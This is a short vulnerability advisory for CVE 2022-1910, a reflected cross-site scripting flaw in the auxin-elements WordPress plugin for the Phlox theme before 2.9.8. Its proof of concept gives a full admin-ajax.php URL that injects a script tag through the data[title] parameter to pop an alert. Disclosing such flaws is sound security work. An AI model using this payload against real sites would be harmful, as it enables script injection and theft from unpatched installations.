Shortcodes and extra features for Phlox theme < 2.9.8 – Reflected Cross-Site-Scripting | CVE 2022-1910

Description

The plugin does not sanitise and escape a parameter before outputting it back in the response, leading to a Reflected Cross-Site Scripting

Proof of Concept

1. Install and activate the plugin's dependencies:
    + Phlox (install and active it - theme can be found @ https://wordpress.org/themes/phlox/ )
    + WooCommerce (no setup required)
2. Install the vulnerable plugin (auxin-elements)
3. Visit the following URL to trigger an alert box:

https://example.com/wp-admin/admin-ajax.php?action=aux_the_recent_products&data[wp_query_args][post_type]=post&data[title]=%3Cscript%3Ealert(`xss`);%3C/script%3E

Note: The `data[wp_query_args][post_type]=post` parameter is used to query for posts instead of products to avoid an empty response as no products have been created beforehand. If there are products in the database, this parameter can be removed.